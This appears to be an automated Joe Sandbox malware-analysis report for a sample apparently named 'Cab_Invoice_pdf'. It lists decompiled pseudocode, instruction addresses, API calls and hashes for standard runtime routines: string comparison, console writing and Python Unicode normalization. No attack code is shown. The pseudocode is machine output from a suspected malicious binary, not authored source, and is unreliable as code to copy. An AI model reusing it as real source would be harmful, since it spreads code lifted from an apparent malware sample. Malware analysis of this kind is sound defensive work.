                            • Instruction ID: 1ec15ea0bded8a1228b1423270a4caae19ab23d71fe9e0c9a6ca48847eb2c96d
                            • Opcode Fuzzy Hash: e42cfaba25fa1041fc4ffa0a063112d0061c4d226785625929944f32848bc7df
                            • Instruction Fuzzy Hash: EE01F93779533676CA3161AF7C09FCB6AD9CFD1BB9F150225FA18F2288D650940282F5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0132D04A, Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                            Download Yara Rule
                            C-Code - Quality: 85%
                            			E0132D04A(int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				short* _v32;
				int _v36;
				char* _v40;
				int _v44;
				intOrPtr _v48;
				void* _v60;
				signed int _t63;
				short* _t68;
				int _t69;
				signed int _t71;
				short* _t72;
				signed int _t75;
				short* _t85;
				int _t93;
				intOrPtr _t96;
				intOrPtr _t97;
				signed int _t107;
				char* _t109;
				char* _t110;
				void* _t115;
				void* _t116;
				intOrPtr _t117;
				intOrPtr _t118;
				intOrPtr* _t120;
				short* _t122;
				int _t124;
				int _t126;
				short* _t127;
				intOrPtr* _t128;
				signed int _t129;
				short* _t130;

				_t63 =  *0x133c008; // 0xa212446c
				_v8 = _t63 ^ _t129;
				_t124 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t67 = _a24;
				_v40 = _a24;
				_t120 = _a16;
				_v36 = _t120;
				if(_t124 <= 0) {
					if(_t124 >= 0xffffffff) {
						goto L2;
					} else {
						goto L5;
					}
				} else {
					_t124 = E0132CA63(_t120, _t124);
					_t67 = _v40;
					L2:
					_t93 = _a28;
					if(_t93 <= 0) {
						if(_t93 < 0xffffffff) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						_t93 = E0132CA63(_t67, _t93);
						L7:
						_t69 = _a32;
						if(_t69 == 0) {
							_t69 =  *( *_v44 + 8);
							_a32 = _t69;
						}
						if(_t124 == 0 || _t93 == 0) {
							if(_t124 != _t93) {
								if(_t93 <= 1) {
									if(_t124 <= 1) {
										if(GetCPInfo(_t69,  &_v28) == 0) {
											goto L5;
										} else {
											if(_t124 <= 0) {
												if(_t93 <= 0) {
													goto L36;
												} else {
													_t68 = 2;
													if(_v28 >= _t68) {
														_t109 =  &_v22;
														if(_v22 != 0) {
															_t128 = _v40;
															while(1) {
																_t117 =  *((intOrPtr*)(_t109 + 1));
																if(_t117 == 0) {
																	goto L15;
																}
																_t96 =  *_t128;
																if(_t96 <  *_t109 || _t96 > _t117) {
																	_t109 = _t109 + _t68;
																	if( *_t109 != 0) {
																		continue;
																	} else {
																		goto L15;
																	}
																}
																goto L63;
															}
														}
													}
													goto L15;
												}
											} else {
												_t68 = 2;
												if(_v28 >= _t68) {
													_t110 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t118 =  *((intOrPtr*)(_t110 + 1));
															if(_t118 == 0) {
																goto L17;
															}
															_t97 =  *_t120;
															if(_t97 <  *_t110 || _t97 > _t118) {
																_t110 = _t110 + _t68;
																if( *_t110 != 0) {
																	continue;
																} else {
																	goto L17;
																}
															}
															goto L63;
														}
													}
												}
												goto L17;
											}
										}
									} else {
										L17:
										_push(3);
										goto L13;
									}
								} else {
									L15:
									_t68 = 1;
								}
							} else {
								_push(2);
								L13:
								_pop(_t68);
							}
						} else {
							L36:
							_t122 = 0;
							_t71 = MultiByteToWideChar(_a32, 9, _v36, _t124, 0, 0);
							_v44 = _t71;
							if(_t71 == 0) {
								L5:
								_t68 = 0;
							} else {
								_t115 = _t71 + _t71;
								asm("sbb eax, eax");
								if((_t115 + 0x00000008 & _t71) == 0) {
									_t72 = 0;
									_v32 = 0;
									goto L45;
								} else {
									asm("sbb eax, eax");
									_t83 = _t71 & _t115 + 0x00000008;
									_t107 = _t115 + 8;
									if((_t71 & _t115 + 0x00000008) > 0x400) {
										asm("sbb eax, eax");
										_t85 = E01320A25(_t107, _t83 & _t107);
										_v32 = _t85;
										if(_t85 == 0) {
											goto L61;
										} else {
											 *_t85 = 0xdddd;
											goto L43;
										}
									} else {
										asm("sbb eax, eax");
										E0132F250();
										_t85 = _t130;
										_v32 = _t85;
										if(_t85 == 0) {
											L61:
											_t95 = _v32;
										} else {
											 *_t85 = 0xcccc;
											L43:
											_t72 =  &(_t85[4]);
											_v32 = _t72;
											L45:
											if(_t72 == 0) {
												goto L61;
											} else {
												_t126 = _a32;
												if(MultiByteToWideChar(_t126, 1, _v36, _t124, _t72, _v44) == 0) {
													goto L61;
												} else {
													_t75 = MultiByteToWideChar(_t126, 9, _v40, _t93, _t122, _t122);
													_v36 = _t75;
													if(_t75 == 0) {
														goto L61;
													} else {
														_t116 = _t75 + _t75;
														_t103 = _t116 + 8;
														asm("sbb eax, eax");
														if((_t116 + 0x00000008 & _t75) == 0) {
															_t127 = _t122;
															goto L56;
														} else {
															asm("sbb eax, eax");
															_t79 = _t75 & _t116 + 0x00000008;
															_t103 = _t116 + 8;
															if((_t75 & _t116 + 0x00000008) > 0x400) {
																asm("sbb eax, eax");
																_t127 = E01320A25(_t103, _t79 & _t103);
																_pop(_t103);
																if(_t127 == 0) {
																	goto L59;
																} else {
																	 *_t127 = 0xdddd;
																	goto L54;
																}
															} else {
																asm("sbb eax, eax");
																E0132F250();
																_t127 = _t130;
																if(_t127 == 0) {
																	L59:
																	_t95 = _v32;
																} else {
																	 *_t127 = 0xcccc;
																	L54:
																	_t127 =  &(_t127[4]);
																	L56:
																	if(_t127 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t93, _t127, _v36) == 0) {
																		goto L59;
																	} else {
																		_t95 = _v32;
																		_t122 = E013236EC(_t103, _v48, _a12, _v32, _v44, _t127, _v36, _t122, _t122, _t122);
																	}
																}
															}
														}
														E0132815E(_t127);
													}
												}
											}
										}
									}
								}
								E0132815E(_t95);
								_t68 = _t122;
							}
						}
					}
				}
				L63:
				E0131786A();
				return _t68;
			}





































                            0x0132d052
                            0x0132d059
                            0x0132d061
                            0x0132d064
                            0x0132d06a
                            0x0132d06d
                            0x0132d070
                            0x0132d074
                            0x0132d077
                            0x0132d07c
                            0x0132d0a3
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132d07e
                            0x0132d086
                            0x0132d088
                            0x0132d08c
                            0x0132d08c
                            0x0132d091
                            0x0132d0af
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132d093
                            0x0132d09c
                            0x0132d0b1
                            0x0132d0b1
                            0x0132d0b6
                            0x0132d0bd
                            0x0132d0c0
                            0x0132d0c0
                            0x0132d0c5
                            0x0132d0d1
                            0x0132d0de
                            0x0132d0eb
                            0x0132d0fe
                            0x00000000
                            0x0132d100
                            0x0132d102
                            0x0132d135
                            0x00000000
                            0x0132d137
                            0x0132d139
                            0x0132d13d
                            0x0132d143
                            0x0132d146
                            0x0132d148
                            0x0132d14b
                            0x0132d14b
                            0x0132d150
                            0x00000000
                            0x00000000
                            0x0132d152
                            0x0132d156
                            0x0132d160
                            0x0132d165
                            0x00000000
                            0x0132d167
                            0x00000000
                            0x0132d167
                            0x0132d165
                            0x00000000
                            0x0132d156
                            0x0132d14b
                            0x0132d146
                            0x00000000
                            0x0132d13d
                            0x0132d104
                            0x0132d106
                            0x0132d10a
                            0x0132d110
                            0x0132d113
                            0x0132d115
                            0x0132d115
                            0x0132d11a
                            0x00000000
                            0x00000000
                            0x0132d11c
                            0x0132d120
                            0x0132d12a
                            0x0132d12f
                            0x00000000
                            0x0132d131
                            0x00000000
                            0x0132d131
                            0x0132d12f
                            0x00000000
                            0x0132d120
                            0x0132d115
                            0x0132d113
                            0x00000000
                            0x0132d10a
                            0x0132d102
                            0x0132d0ed
                            0x0132d0ed
                            0x0132d0ed
                            0x00000000
                            0x0132d0ed
                            0x0132d0e0
                            0x0132d0e0
                            0x0132d0e2
                            0x0132d0e2
                            0x0132d0d3
                            0x0132d0d3
                            0x0132d0d5
                            0x0132d0d5
                            0x0132d0d5
                            0x0132d16c
                            0x0132d16c
                            0x0132d16c
                            0x0132d179
                            0x0132d17f
                            0x0132d184
                            0x0132d0a5
                            0x0132d0a5
                            0x0132d18a
                            0x0132d18a
                            0x0132d192
                            0x0132d196
                            0x0132d1f1
                            0x0132d1f3
                            0x00000000
                            0x0132d198
                            0x0132d19d
                            0x0132d19f
                            0x0132d1a1
                            0x0132d1a9
                            0x0132d1cd
                            0x0132d1d2
                            0x0132d1d7
                            0x0132d1dd
                            0x00000000
                            0x0132d1e3
                            0x0132d1e3
                            0x00000000
                            0x0132d1e3
                            0x0132d1ab
                            0x0132d1ad
                            0x0132d1b1
                            0x0132d1b6
                            0x0132d1b8
                            0x0132d1bd
                            0x0132d2d2
                            0x0132d2d2
                            0x0132d1c3
                            0x0132d1c3
                            0x0132d1e9
                            0x0132d1e9
                            0x0132d1ec
                            0x0132d1f6
                            0x0132d1f8
                            0x00000000
                            0x0132d1fe
                            0x0132d206
                            0x0132d214
                            0x00000000
                            0x0132d21a
                            0x0132d223
                            0x0132d229
                            0x0132d22e
                            0x00000000
                            0x0132d234
                            0x0132d234
                            0x0132d237
                            0x0132d23c
                            0x0132d240
                            0x0132d28c
                            0x00000000
                            0x0132d242
                            0x0132d247
                            0x0132d249
                            0x0132d24b
                            0x0132d253
                            0x0132d270
                            0x0132d27a
                            0x0132d27c
                            0x0132d27f
                            0x00000000
                            0x0132d281
                            0x0132d281
                            0x00000000
                            0x0132d281
                            0x0132d255
                            0x0132d257
                            0x0132d25b
                            0x0132d260
                            0x0132d264
                            0x0132d2c6
                            0x0132d2c6
                            0x0132d266
                            0x0132d266
                            0x0132d287
                            0x0132d287
                            0x0132d28e
                            0x0132d290
                            0x00000000
                            0x0132d2a9
                            0x0132d2a9
                            0x0132d2c2
                            0x0132d2c2
                            0x0132d290
                            0x0132d264
                            0x0132d253
                            0x0132d2ca
                            0x0132d2cf
                            0x0132d22e
                            0x0132d214
                            0x0132d1f8
                            0x0132d1bd
                            0x0132d1a9
                            0x0132d2d6
                            0x0132d2dc
                            0x0132d2dc
                            0x0132d184
                            0x0132d0c5
                            0x0132d091
                            0x0132d2de
                            0x0132d2e9
                            0x0132d2f1

                            APIs
                            • GetCPInfo.KERNEL32(00000000,00000001,00000000,7FFFFFFF,?,?,0132D323,00000000,00000000,00000000,00000001,?,?,?,?,00000001), ref: 0132D0F6
                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0132D323,00000000,00000000,00000000,00000001,?,?,?,?), ref: 0132D179
                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0132D323,?,0132D323,00000000,00000000,00000000,00000001,?,?,?,?), ref: 0132D20C
                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0132D323,00000000,00000000,00000000,00000001,?,?,?,?), ref: 0132D223
                              • Part of subcall function 01320A25: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,013280E5,00000000,?,01320C3C,?,00000008,?,01323E2E,?,?,?), ref: 01320A57
                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0132D323,00000000,00000000,00000000,00000001,?,?,?,?), ref: 0132D29F
                            • __freea.LIBCMT ref: 0132D2CA
                            • __freea.LIBCMT ref: 0132D2D6
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                            • String ID:
                            • API String ID: 2829977744-0
                            • Opcode ID: 77d5d1e3a1191f2585c16a847cc7cf6791cd3a9ecea0306126bf493f5a5eed91
                            • Instruction ID: 4fc1b87ba5e2d5526e9c9426ab74f100526de1b2710f6937ebadfe2848311d60
                            • Opcode Fuzzy Hash: 77d5d1e3a1191f2585c16a847cc7cf6791cd3a9ecea0306126bf493f5a5eed91
                            • Instruction Fuzzy Hash: DD91D971E0032A9FEB25AEE8CC40EEEBBB9EF06768F148559E905E7150D735D841C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01322A10, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 76%
                            			E01322A10(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x133c008; // 0xa212446c
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x1346108 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x1346108 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E01327D33(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x1346108 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x1346108 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x1346108 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E01323F5B( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E01323F5B();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E0131786A();
				return _t136;
			}



































                            0x01322a18
                            0x01322a1f
                            0x01322a22
                            0x01322a2a
                            0x01322a2e
                            0x01322a3a
                            0x01322a3d
                            0x01322a40
                            0x01322a47
                            0x01322a4f
                            0x01322a52
                            0x01322a58
                            0x01322a5e
                            0x01322a63
                            0x01322a65
                            0x01322a68
                            0x01322a6d
                            0x01322a77
                            0x01322a7e
                            0x01322a81
                            0x01322a88
                            0x01322a8f
                            0x01322abb
                            0x01322ae1
                            0x01322ae3
                            0x00000000
                            0x01322abd
                            0x01322ac0
                            0x01322b87
                            0x01322b93
                            0x01322b9e
                            0x01322ba3
                            0x01322ac6
                            0x01322acd
                            0x01322ad2
                            0x01322ad8
                            0x01322ade
                            0x00000000
                            0x01322ade
                            0x01322ad8
                            0x01322ac0
                            0x01322a91
                            0x01322a95
                            0x01322a98
                            0x01322a9e
                            0x01322aa0
                            0x01322aa3
                            0x01322aa7
                            0x01322ae4
                            0x01322ae7
                            0x01322ae8
                            0x01322aed
                            0x01322af3
                            0x01322af9
                            0x01322b08
                            0x01322b0e
                            0x01322b14
                            0x01322b19
                            0x01322b35
                            0x01322ba8
                            0x01322bae
                            0x01322b37
                            0x01322b3f
                            0x01322b48
                            0x01322b4e
                            0x00000000
                            0x01322b50
                            0x01322b52
                            0x01322b55
                            0x01322b6e
                            0x00000000
                            0x01322b70
                            0x01322b74
                            0x01322b76
                            0x01322b79
                            0x00000000
                            0x01322b79
                            0x01322b74
                            0x01322b6e
                            0x01322b4e
                            0x01322b48
                            0x01322b35
                            0x01322b19
                            0x01322af3
                            0x00000000
                            0x01322b7c
                            0x01322b7c
                            0x01322bb0
                            0x01322bba
                            0x01322bc2

                            APIs
                            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,01323185,?,00000000,?,00000000,00000000), ref: 01322A52
                            • __fassign.LIBCMT ref: 01322ACD
                            • __fassign.LIBCMT ref: 01322AE8
                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 01322B0E
                            • WriteFile.KERNEL32(?,?,00000000,01323185,00000000,?,?,?,?,?,?,?,?,?,01323185,?), ref: 01322B2D
                            • WriteFile.KERNEL32(?,?,00000001,01323185,00000000,?,?,?,?,?,?,?,?,?,01323185,?), ref: 01322B66
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                            • String ID:
                            • API String ID: 1324828854-0
                            • Opcode ID: 9f82d53c7932f6bdb7ef92b9339c56e1d5bbbb45b6c2ef89299796072e4e38fd
                            • Instruction ID: e85fe1460474c5779a6725feafb0ecf146e591fcf20f926945536de5fbb692c8
                            • Opcode Fuzzy Hash: 9f82d53c7932f6bdb7ef92b9339c56e1d5bbbb45b6c2ef89299796072e4e38fd
                            • Instruction Fuzzy Hash: DE51C0B1A00219AFDF24DFA8DC85AEEBBF8FF09314F14455AE955E7241D730A941CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6E2F37E0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128COMMON
                            Download Yara Rule
                            C-Code - Quality: 51%
                            			E6E2F37E0(void* __ecx, void* __edx, intOrPtr* _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t3;
				void* _t6;
				void* _t9;
				void* _t26;
				intOrPtr* _t27;

				_t27 = _a4;
				_t26 = __ecx;
				if( *((intOrPtr*)(_t27 + 8)) != 0) {
					__imp___PyUnicode_EqualToASCIIId(__edx, 0x6e3f8a28);
					__eflags = _t3;
					if(_t3 == 0) {
						__imp___PyUnicode_EqualToASCIIId(__edx, 0x6e3f8a34);
						__eflags = _t3;
						if(_t3 == 0) {
							__imp___PyUnicode_EqualToASCIIId(__edx, 0x6e3f837c);
							__eflags = _t3;
							if(_t3 == 0) {
								__imp___PyUnicode_EqualToASCIIId(__edx, 0x6e3f8370);
								__eflags = _t3;
								if(_t3 == 0) {
									__imp__PyErr_SetString( *__imp__PyExc_ValueError, "invalid normalization form");
									__eflags = 0;
									return 0;
								} else {
									_t6 = E6E2F3550(__ecx, _t27, 0, 1, 1);
									__eflags = _t6;
									if(_t6 == 0) {
										goto L1;
									} else {
										return E6E2F2A70(__edx, _t26, _t27, _t26, _t27, 1);
									}
								}
							} else {
								_t9 = E6E2F3550(__ecx, _t27, 0, 0, 1);
								__eflags = _t9;
								if(_t9 == 0) {
									goto L1;
								} else {
									return E6E2F2A70(__edx, _t26, _t27, _t26, _t27, 0);
								}
							}
						} else {
							__eflags = E6E2F3550(__ecx, _t27, 1, 1, 1);
							if(__eflags == 0) {
								goto L1;
							} else {
								return E6E2F3030(__edx, _t26, _t27, __eflags, _t26, _t27, 1);
							}
						}
					} else {
						__eflags = E6E2F3550(__ecx, _t27, 1, 0, 1);
						if(__eflags == 0) {
							goto L1;
						} else {
							return E6E2F3030(__edx, _t26, _t27, __eflags, _t26, _t27, 0);
						}
					}
				} else {
					L1:
					 *_t27 =  *_t27 + 1;
					return _t27;
				}
			}











                            0x6e2f37e5
                            0x6e2f37eb
                            0x6e2f37f1
                            0x6e2f3802
                            0x6e2f380b
                            0x6e2f380d
                            0x6e2f383c
                            0x6e2f3845
                            0x6e2f3847
                            0x6e2f3876
                            0x6e2f387f
                            0x6e2f3881
                            0x6e2f38b4
                            0x6e2f38bd
                            0x6e2f38bf
                            0x6e2f38f8
                            0x6e2f3901
                            0x6e2f3907
                            0x6e2f38c1
                            0x6e2f38cb
                            0x6e2f38d3
                            0x6e2f38d5
                            0x00000000
                            0x6e2f38db
                            0x6e2f38eb
                            0x6e2f38eb
                            0x6e2f38d5
                            0x6e2f3883
                            0x6e2f388d
                            0x6e2f3895
                            0x6e2f3897
                            0x00000000
                            0x6e2f389d
                            0x6e2f38ad
                            0x6e2f38ad
                            0x6e2f3897
                            0x6e2f3849
                            0x6e2f385b
                            0x6e2f385d
                            0x00000000
                            0x6e2f385f
                            0x6e2f386f
                            0x6e2f386f
                            0x6e2f385d
                            0x6e2f380f
                            0x6e2f3821
                            0x6e2f3823
                            0x00000000
                            0x6e2f3825
                            0x6e2f3835
                            0x6e2f3835
                            0x6e2f3823
                            0x6e2f37f3
                            0x6e2f37f3
                            0x6e2f37f3
                            0x6e2f37fb
                            0x6e2f37fb

                            APIs
                            • _PyUnicode_EqualToASCIIId.PYTHON38(?,6E3F8A28), ref: 6E2F3802
                            Strings
                            • invalid normalization form, xrefs: 6E2F38F1
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: EqualUnicode_
                            • String ID: invalid normalization form
                            • API String ID: 3822945493-2281882113
                            • Opcode ID: c599dc51f8004272abf1c06a13fb654f5fcbbaf3dc59d0efe019630a2080f0cf
                            • Instruction ID: f24ecd03c31b8a890e131a384ae9fb3a8d7c676673f3ca67f2bd2cc23aa96b9a
                            • Opcode Fuzzy Hash: c599dc51f8004272abf1c06a13fb654f5fcbbaf3dc59d0efe019630a2080f0cf
                            • Instruction Fuzzy Hash: AD31DF76BD010967FD1011A97C9ABABB74FEBC176FF140036FA09D92C1EA93D05681E2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6E2F1620, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 108COMMON
                            Download Yara Rule
                            APIs
                            • _PyArg_BadArgument.PYTHON38(category,argument,a unicode character,?), ref: 6E2F1643
                            • _PyUnicode_Ready.PYTHON38(?), ref: 6E2F1658
                            • PyUnicode_FromString.PYTHON38 ref: 6E2F1742
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Unicode_$Arg_ArgumentFromReadyString
                            • String ID: a unicode character$argument$category
                            • API String ID: 3000140846-2068800536
                            • Opcode ID: 2340c8f7ea8ffafdc6fee6b14c5b6d4f79176588c13015ce15fd1852b6b20086
                            • Instruction ID: dab722728629debfbe80f8c87f8a36daca0fc5cf6a84b6cb9ea02a99bf7b2205
                            • Opcode Fuzzy Hash: 2340c8f7ea8ffafdc6fee6b14c5b6d4f79176588c13015ce15fd1852b6b20086
                            • Instruction Fuzzy Hash: 27313BF2BF452ACBD7004BA9C851A29B3E3DB46616B8C4259F496CB387D325D48BC790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6E2F18A0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 108COMMON
                            Download Yara Rule
                            APIs
                            • _PyArg_BadArgument.PYTHON38(combining,argument,a unicode character,?), ref: 6E2F18C3
                            • _PyUnicode_Ready.PYTHON38(?), ref: 6E2F18D8
                            • PyLong_FromLong.PYTHON38(?), ref: 6E2F19BC
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Arg_ArgumentFromLongLong_ReadyUnicode_
                            • String ID: a unicode character$argument$combining
                            • API String ID: 4207899037-4202047184
                            • Opcode ID: 1c38538710d60f910587390343a238186ac0e69129618c992e8a07b4f02b3e4e
                            • Instruction ID: 70485c6119b4a28549f3445060d7782d8a97b3a6f3ce78fd2daea4d65c2a8220
                            • Opcode Fuzzy Hash: 1c38538710d60f910587390343a238186ac0e69129618c992e8a07b4f02b3e4e
                            • Instruction Fuzzy Hash: CF317CF27F456ACBE7004BADCD41B39B3E6FF02615B484268F496CA282D324D5CAC6D0
                            Uniqueness

                            Uniqueness Score: -1.00%

